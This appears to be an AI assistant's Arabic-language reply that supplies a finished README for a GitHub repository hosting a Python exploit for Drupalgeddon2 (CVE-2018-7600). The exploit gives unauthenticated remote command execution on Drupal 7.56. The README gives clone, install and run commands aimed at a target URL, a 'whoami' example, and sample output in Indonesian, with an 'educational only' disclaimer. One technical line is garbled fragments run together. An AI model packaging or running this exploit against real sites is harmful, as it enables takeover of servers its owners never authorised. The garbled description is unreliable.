
برنامج بايثون لتنفيذ RCE على دروبال الإصدار 7.56
جاهز يا ديفا، لقد أضفت أيضًا قسم الاستخدام بدءًا من git clone، لذا أصبح ملف README كاملاً.
هذه هي النسخة النهائية التي عليك فقط نسخها ولصقها في README.md في مستودع GitHub الخاص بك.
يستغل هذا الاستغلال ثغرة Drupal 7.56 (وبعض الإصدارات السابقة) المعروفة باسم Drupalgeddon2.
تسمح هذه الثغرة بتنفيذ الأوامر عن بُعد (Remote Code Execution (RCE)) بدون مصادقة من خلال استغلال ثغرة في نموذج ضعيف.
🔗 المستودع: https://github.com/xxxTectationxxx/CVE-2018-7600
تم إنشاء هذا السكريبت لأغراض تعليمية فقط ولاختبار في بيئة مختبرية.
يمنع استخدامه على أنظمة ليس لديها إذن رسمي للاختبار.
user/password مع معلمات تؤدي إلى تشغيل دالة في PHP.passthru()form_build_id من استجابة الخادم.استنساخ المستودع:
git clone https://github.com/xxxTectationxxx/CVE-2018-7600.git
cd CVE-2018-7600
تثبيت التبعيات:
pip install requests
تشغيل الاستغلال:
python3 drupalgeddon2.py --URL <target_url> --COMMAND "<command>"
مثال:
python3 drupalgeddon2.py --URL http://192.168.60.129 --COMMAND "whoami"
[*] Mengirim payload awal ke target...
[+] form_build_id ditemukan: form-ABC123XYZ
[+] Output command:
www-data
إخلاء المسؤولية: لا يتحمل المؤلف أي مسؤولية عن إساءة استخدام هذا السكريبت. استخدمه بحكمة وفقط على الأنظمة المصرح باختبارها.